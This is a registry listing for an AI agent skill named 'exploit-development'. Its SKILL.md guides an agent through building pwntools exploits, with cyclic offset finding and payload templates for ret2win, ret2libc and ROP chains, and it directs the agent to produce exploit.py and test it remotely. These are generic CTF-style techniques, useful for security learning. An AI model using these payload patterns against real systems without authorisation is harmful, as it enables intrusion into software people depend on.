Agent skill
exploit-development
Develop working exploits using pwntools. Includes exploit template and common patterns.
Stars
163
Forks
31
Install this agent skill to your Project
npx add-skill https://github.com/majiayu000/claude-skill-registry/tree/main/skills/development/exploit-development-amattas-agentic-coding
SKILL.md
Exploit Development
Build working exploits based on vulnerability analysis.
Exploit Development Process
- Start from template - Use
templates/exploit.py - Find offset - Use cyclic pattern
- Identify target - Win function, ROP chain, shellcode
- Handle mitigations - Leak addresses if needed
- Build payload - Padding + control flow hijack
- Test locally - With and without GDB
- Test remote - Adjust for remote environment
Stack Consistency (CRITICAL)
Always use fixed argv[0] and empty environment:
python
ARGV0 = "/pwn"
ENV = {}
def conn():
if args.GDB:
return gdb.debug([EXECUTABLE], env=ENV, argv=[ARGV0], gdbscript='...')
else:
return process([EXECUTABLE], env=ENV, argv=[ARGV0])
This ensures stack addresses match between normal run and GDB debug.
Finding Offset
python
# Generate pattern
from pwn import cyclic, cyclic_find
payload = cyclic(200)
# After crash, find offset
# In GDB: cyclic -l 0x61616168
offset = cyclic_find(0x61616168)
Common Payload Patterns
Simple ret2win
python
payload = b'A' * offset
payload += p64(win_addr)
ret2win with alignment
python
payload = b'A' * offset
payload += p64(ret_gadget) # 16-byte alignment
payload += p64(win_addr)
ret2libc
python
payload = b'A' * offset
payload += p64(ret_gadget)
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
ROP with pwntools
python
rop = ROP(elf)
rop.call('function', [arg1, arg2])
payload = b'A' * offset + rop.chain()
Debugging Tips
context.log_level = 'debug'for verbose outputgdb.attach(p)to attach to running processpause()to stop and inspect- Print addresses:
print(f"addr: {hex(addr)}")
Output
Produce exploit.py using the template.
Didn't find tool you were looking for?